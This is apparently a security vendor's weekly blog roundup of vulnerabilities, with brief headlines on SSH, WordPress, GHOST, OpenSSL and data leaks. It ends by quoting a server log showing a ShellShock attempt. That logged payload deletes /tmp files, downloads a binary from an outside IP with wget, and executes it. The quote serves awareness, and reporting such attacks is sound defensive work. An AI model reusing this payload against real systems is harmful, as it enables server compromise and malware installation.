For well over a decade our focus at ionCube has been on PHP security but recently with the release of ionCube24 we have been looking into different kinds of vulnerabilities. This post has a few of the interesting issues we have found this week.
Another SSH issue!
Web attached cameras seem to pop up on a regular basis – if you have *any* cam always put a bit of extra protection in front of it. You just never know!
GHOST continues to be a problem
Not everything appears safe at first glance!
This vulnerability affects WordPress and is something that ionCube24 can protect against.
And a leak can cost you more than just money.
How *not* to handle a security disclosure
A bit of a nasty WordPress one.
A leak can be very costly!
This old piece of code has had a few disclosures recently
Some OpenSSL issues this week
Even those with a focus on security can also be caught out!
One of our own weblogs recently had a sobering reminder of the ShellShock bug from last year, which had been a critical vulnerability in the Open Source Unix BASH shell for 25 years.
[pastacode lang=”php” message=”” highlight=”” provider=”manual”]
222.186.21.115 - - [16/Mar/2015:12:47:14 +0000] "GET / HTTP/1.1" 403 4874 "() { :; }; /bin/bash -c \"rm -rf /tmp/*;ec\
ho wget http://222.186.21.115:999/udso -O /tmp/China.Z-aoii\xb8 >> /tmp/Run.sh;echo echo By China.Z >> /tmp/Run.sh;ec\
ho chmod 777 /tmp/China.Z-aoii\xb8 >> /tmp/Run.sh;echo /tmp/China.Z-aoii\xb8 >> /tmp/Run.sh;echo rm -rf /tmp/Run.sh >\
> /tmp/Run.sh;chmod 777 /tmp/Run.sh;/tmp/Run.sh\"" "() { :; }; /bin/bash -c \"rm -rf /tmp/*;echo wget http://222.186.\
21.115:999/udso -O /tmp/China.Z-aoii\xb8 >> /tmp/Run.sh;echo echo By China.Z >> /tmp/Run.sh;echo chmod 777 /tmp/China\
.Z-aoii\xb8 >> /tmp/Run.sh;echo /tmp/China.Z-aoii\xb8 >> /tmp/Run.sh;echo rm -rf /tmp/Run.sh >> /tmp/Run.sh;chmod 777\
/tmp/Run.sh;/tmp/Run.sh\""
[/pastacode]
These are just a few examples of the vulnerabilities found this week and the list is continually growing. Be sure to stay updated and give yourself as much protection as possible from these cyber threats.